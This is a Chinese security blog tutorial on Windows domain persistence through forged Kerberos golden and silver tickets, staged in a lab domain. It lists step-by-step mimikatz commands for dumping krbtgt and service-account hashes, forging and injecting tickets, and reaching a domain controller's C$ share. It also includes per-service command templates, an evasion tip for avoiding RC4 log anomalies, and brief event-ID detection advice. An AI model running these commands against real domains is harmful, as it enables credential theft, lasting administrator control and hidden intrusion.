Windows 权限维持 · 黄金、白银票据

admin 2025年3月18日22:27:12评论5 views字数 2857阅读9分31秒阅读模式

环境:

- 域   控:Windows Server 2022(DC2022)

- 域用户:Windows Server 2022(CN-2022-DU)

黄金票据(Golden Tiket)

黄金票据是一种在 Kerberos 协议攻击中伪造的票据授予票据(Ticket Granting Ticket,TGT),用于在域渗透中实现权限维持。通过伪造 TGT,渗透人员可以绕过 Kerberos 认证的身份验证环节,长期控制域内资源。

原理

Kerberos 认证过程中,客户端(Client)通过身份认证服务(AS)获取 TGT,该票据由 krbtgt 账户的 NTLM Hash 加密。由于 krbtgt 的 Hash 值固定且 TGT 的会话密钥(LogonSessionKey)不会保存在 KDC(密钥分发中心)中,渗透人员一旦获取 krbtgt 账户的 NTLM Hash,即可伪造合法的 TGT。

TGT 可直接用于与票据授予服务(TGS)交互,无需验证用户密码,即使域管理员修改了密码,渗透人员仍然可以维持权限。

Kerberos TGT

krbtgt(Kerberos TGT)用户是域自带的用户,被密钥分发中心(KDC)所使用,属于 Domain Users 组。在域环境中,每个用户账号的票据都是由 krbtgt 用户生成的。

如果知道了 krbtgt 用户的 NTLM 哈希,就可以伪造域内任意用户的身份。

Windows 权限维持 · 黄金、白银票据
Windows 权限维持 · 黄金、白银票据

生成黄金票据的条件

1、域基本信息:域名、域的 SID 值(安全标识符,需去除用户 RID 后缀)。
2、关键凭证:krbtgt 账户的 NTLM Hash(通过域控权限或 DCSync 攻击获取)。

3、其他信息:模拟的任意用户账户名称。

攻击流程

1、提升权限(在域控制器操作)。
privilege::debug
Windows 权限维持 · 黄金、白银票据
2、获取域的 SID 值和 krbtgt 账户的密码哈希(在域控制器操作)。
lsadump::lsa /inject /name:krbtgt
Windows 权限维持 · 黄金、白银票据
3、生成黄金票据(在普通域用户操作)。
kerberos::golden /user:伪造的用户名 /domain:域名 /sid:域的 SID 值 /krbtgt:krbtgt 账户的 NTLM Hash /id:500
ID:500 表示伪造的黄金票据将关联到域管理员账户(RID 500)
Windows 权限维持 · 黄金、白银票据
生成的票据离线存储在 mimikatz 目录下。
Windows 权限维持 · 黄金、白银票据
4、将生成的票据加载到内存(在普通域用户操作)。
kerberos::ptt ticket.kirbi
Windows 权限维持 · 黄金、白银票据
5、通过 mimikatz 打开新会话(在普通域用户操作)。
misc::cmd
Windows 权限维持 · 黄金、白银票据
6、通过共享访问或远程执行(如 PsExec)控制域控来验证是否生效(在普通域用户操作)。
dir \域控C$
Windows 权限维持 · 黄金、白银票据
通过 klist 可以看到使用的是虚假的票据(在普通域用户操作)。
Windows 权限维持 · 黄金、白银票据

黄金票据特点

• 通过 "票据传递"(Pass The Ticket,PTT)可访问域内所有服务资源。• 票据有效期可自定义,且不受密码策略影响。• 可伪造任意用户身份(如域管理员)。• 无需与 KDC 频繁交互,仅需一次 TGT 伪造即可长期使用。

防御与检测

• 检查事件 ID 4769(TGS 请求)是否伴随合法 TGT(事件 ID 4768),异常情况可能为黄金票据攻击。• 监控对域控共享资源(如 C$)的异常访问(事件 ID 5140)。

白银票据(Silver Tiket)

白银票据是 Kerberos 协议攻击中一种伪造服务票据(Service Ticket,ST)手段,主要用于在已攻陷的域环境中实现隐蔽的权限维持。与使用黄金票据冒充用户相比,白银票据允许渗透人员冒充网络上的服务和计算机。

针对主机上的服务进行攻击时,先识别具有已注册服务主体名称(SPN)的服务账户,并识别 SPN 类型,类型可能是 CIFS、MSSQL、HOST、HTTP 等。可以使用 Impacket GetUserSPNs.py 脚本来检索具有 SPN 的账户。

原理

通过直接伪造 Kerberos 认证流程中的服务票据(ST),绕过 KDC(密钥分发中心)的验证。渗透人员利用服务账户(如计算机账户)的 NTLM 哈希生成 ST,使渗透人员无需与域控制器交互即可访问特定服务。

局限性

白银票据仅对特定服务有效(如 CIFS 文件共享、LDAP 目录服务等),无法像黄金票据(伪造 TGT)一样访问域内所有资源。

生成白银票据的条件

1、域基本信息:域名、域的 SID 值。2、关键凭证:服务账户的 NTLM Hash。3、其他信息:服务所在主机名、服务类型、模拟的任意用户账户名称。

攻击流程

1、提升权限(在域控制器操作)。

privilege::debug

2、检索域的 SID 值以及具有注册 SPN 的服务账户或计算机账户的 NTML 哈希(在域控制器操作)。

lsadump::lsa /patch

Windows 权限维持 · 黄金、白银票据

3、生成白银票据,并将票据直接注入内存(在普通域用户操作)。

kerberos::golden /domain:hack.com /sid:S-1-5-21-1783398585-996730644-213359695 /service:cifs /target:DC2022 /rc4:b9a04ee56b48ed1c9eddc865f8b5fe1f /user:silver /ptt

Windows 权限维持 · 黄金、白银票据

4、通过 mimikatz 打开新会话(在普通域用户操作)。

misc::cmd

Windows 权限维持 · 黄金、白银票据

5、通过共享访问验证是否生效(在普通域用户操作)。

dir \DC2022C$
Windows 权限维持 · 黄金、白银票据
通过 klist 可以看到使用的是虚假的票据(在普通域用户操作)。
Windows 权限维持 · 黄金、白银票据

不同服务的白银票据生成示例

服务类型
用途
示例命令
CIFS
访问文件共享
kerberos::golden /service:cifs /target:DC01 /rc4:xxxx /user:fakeuser /ptt
LDAP
执行域内查询或修改操作
kerberos::golden /service:ldap /target:DC01 /rc4:xxxx /user:fakeuser /ptt
HOST
远程服务管理
kerberos::golden /service:host /target:WEB01 /rc4:xxxx /user:fakeuser /ptt

注意事项

• 服务类型限制:白银票据仅对指定服务有效(如 CIFS、LDAP 等),无法像黄金票据一样访问所有服务。

• 票据有效期:默认有效期为 10 小时(与 Kerberos 策略一致),手动延长(添加 /endin:600 参数设置 600 分钟)。

• 防御规避:避免在日志中留下异常记录(如事件 ID 4769 中加密类型为 RC4),可使用 AES 加密的哈希(需替换 /rc4 为 /aes256,但需要获取 AES 密钥)。

防御措施

1、监控非正常时间或异常 IP 发起的服务(如 LDAP/CIFS)请求。
2、通过日志分析(如事件 ID 4769)识别异常票据生成。

黄金票据与白银票据的区别

特征
白银票据
黄金票据
伪造对象
服务票据(ST)
票据授予票据(TGT)
访问范围
特定服务(如 CIFS、LDAP)
域内所有服务
依赖条件
服务账户的 NTLM 哈希
KRBTGT 账户的哈希
隐蔽性
更高(无需与 KDC 交互)
较低(需与 KDC 交互)

原文始发于微信公众号(走在网安路上的哥布林):Windows 权限维持 · 黄金、白银票据

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日22:27:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows 权限维持 · 黄金、白银票据https://cn-sec.com/archives/3816126.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息